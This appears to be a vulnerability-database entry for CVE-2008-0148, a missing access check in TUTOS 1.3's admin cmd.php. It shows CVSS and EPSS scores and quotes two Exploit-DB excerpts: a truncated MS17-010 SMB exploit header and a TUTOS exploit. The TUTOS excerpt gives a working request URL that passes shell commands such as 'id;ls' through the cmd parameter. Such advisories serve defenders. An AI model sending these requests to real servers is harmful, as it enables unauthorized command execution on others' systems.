CVE-2008-0148
published 2008-01-09CVE-2008-0148: TUTOS 1.3 does not restrict access to php/admin/cmd.php, which allows remote attackers to execute arbitrary shell commands via the cmd parameter in a direct…
PriorityP357critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
5.79%
92.2th percentile
TUTOS 1.3 does not restrict access to php/admin/cmd.php, which allows remote attackers to execute arbitrary shell commands via the cmd parameter in a direct request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tutos | tutos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)
exploitdb·2017-05-10
CVE-2017-0148 Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)
---
# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com
# Date and time of release: May, 9 2017 - 13:00PM
# Found this and more exploits on my open source security project: http://www.exploitpack.com
#
# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard
#
# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input. Srv.sys process SrvOs2FeaListSizeToNt
# and when the logic is not correct it leads to a cross-border copy. The vulnerability trigger point is as follows:
#
# Vu
Exploit-DB
TUTOS 1.3 - 'cmd.php' Remote Command Execution
exploitdb·2008-01-07
CVE-2008-0149 TUTOS 1.3 - 'cmd.php' Remote Command Execution
TUTOS 1.3 - 'cmd.php' Remote Command Execution
---
######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350} #
# HOME : http://no-hack.net #
# Script : TUTOS (Tested in version 1.3) other versions may also be affected. #
# Download : http://www.tutos.org/homepage/index.html #
# BUG : Command Execution Vulnerability #
######################################################################################
(~)| 3xpl0it4t10n
-1- : Command Execution
http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]
>> we dont need a permission admin for access to '/php/admin/cmd.php' :d
exemple : http://site.com/tutos/php/admin/cmd.php?cmd=id;ls
or we can just enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.ph
No writeups or analysis indexed.
2008-01-09
Published